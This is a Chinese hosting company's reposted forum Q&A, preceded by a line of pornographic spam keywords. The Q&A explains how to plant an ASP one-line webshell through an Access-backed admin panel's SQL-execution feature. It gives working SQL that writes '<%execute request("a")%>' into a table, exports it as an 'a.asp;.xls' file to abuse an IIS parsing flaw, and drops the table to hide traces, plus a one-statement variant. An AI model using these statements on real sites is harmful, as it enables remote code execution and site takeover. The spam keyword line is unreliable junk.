亚洲韩日午夜视频,欧美日韩在线精品一区二区三区,韩国超清无码一区二区三区,亚洲国产成人影院播放,久草新在线,在线看片AV色

您好,歡迎來到思海網(wǎng)絡(luò),我們將竭誠為您提供優(yōu)質(zhì)的服務(wù)! 誠征網(wǎng)絡(luò)推廣 | 網(wǎng)站備案 | 幫助中心 | 軟件下載 | 購買流程 | 付款方式 | 聯(lián)系我們 [ 會員登錄/注冊 ]
促銷推廣
客服中心
業(yè)務(wù)咨詢
有事點擊這里…  531199185
有事點擊這里…  61352289
點擊這里給我發(fā)消息  81721488
有事點擊這里…  376585780
有事點擊這里…  872642803
有事點擊這里…  459248018
有事點擊這里…  61352288
有事點擊這里…  380791050
技術(shù)支持
有事點擊這里…  714236853
有事點擊這里…  719304487
有事點擊這里…  1208894568
有事點擊這里…  61352289
在線客服
有事點擊這里…  531199185
有事點擊這里…  61352288
有事點擊這里…  983054746
有事點擊這里…  893984210
當(dāng)前位置:首頁 >> 技術(shù)文章 >> 文章瀏覽
技術(shù)文章

ACCESS數(shù)據(jù)庫后臺sql語句執(zhí)行導(dǎo)shell

添加時間:2011-3-1  添加: admin 

一個垃圾論壇,access數(shù)據(jù)庫,無其他可利用之處,不過有個sql語句執(zhí)行功能,絕對路徑也知道,小弟對sql語句不懂,記得如果是mysql數(shù)據(jù)庫root權(quán)限可以導(dǎo)出SHELL,這個是否也能導(dǎo)出shell呢?需要什么條件,語句又是什么?網(wǎng)上翻不到資料。麻煩各位。
答:
create table cmd (a varchar(50))
insert into cmd (a) values ('<%execute request("a")%>')
select * into [a] in 'f:\host\qhdyxt\web\a.asp;.xls' 'excel 4.0;' from cmd
drop table cmd
解釋如下:
1.create table a (a varchar(50)) 建立一個有一個A字段的表 表名為a 字段類型為字符 長度為50
2.insert into a (a) values ('<%execute request("a")%>') 在表a的a字段插入密碼為a的一句話木馬
3.select * into [a] in 'F:\jt\work\a.asp;.xls' 'excel 4.0;' from a 把表a的內(nèi)容導(dǎo)出為物理路徑的一個
EXCEL文件,為什么用excel文件,因為ACCESS數(shù)據(jù)庫不允許導(dǎo)出其他危險格式。我們導(dǎo)出為EXCEL后在利用IIS解析漏洞就可以變成我們的小馬了。很*的說~~
4.drop table a 丟家伙閃人 射完就走!

小弟的提問,沒兩分鐘大家就回答了,強烈頂t00ls牛淫。
這個更簡單:
Access利用后臺SQL執(zhí)行命令功能導(dǎo)出WebShell:
SELECT '<%execute request("a")%>' into [vote] in 'd:\web\x.asp;.xls' 'excel 8.0;' from vote
后臺提供SQL執(zhí)行功能且知道絕對路徑方可使用(vote為已知表段)

關(guān)健詞:ACCESS

分享到:

頂部 】 【 關(guān)閉
版權(quán)所有:佛山思海電腦網(wǎng)絡(luò)有限公司 ©1998-2024 All Rights Reserved.
聯(lián)系電話:(0757)22630313、22633833
中華人民共和國增值電信業(yè)務(wù)經(jīng)營許可證: 粵B1.B2-20030321 備案號:粵B2-20030321-1
網(wǎng)站公安備案編號:44060602000007 交互式欄目專項備案編號:200303DD003  
察察 工商 網(wǎng)安 舉報有獎  警警  手機打開網(wǎng)站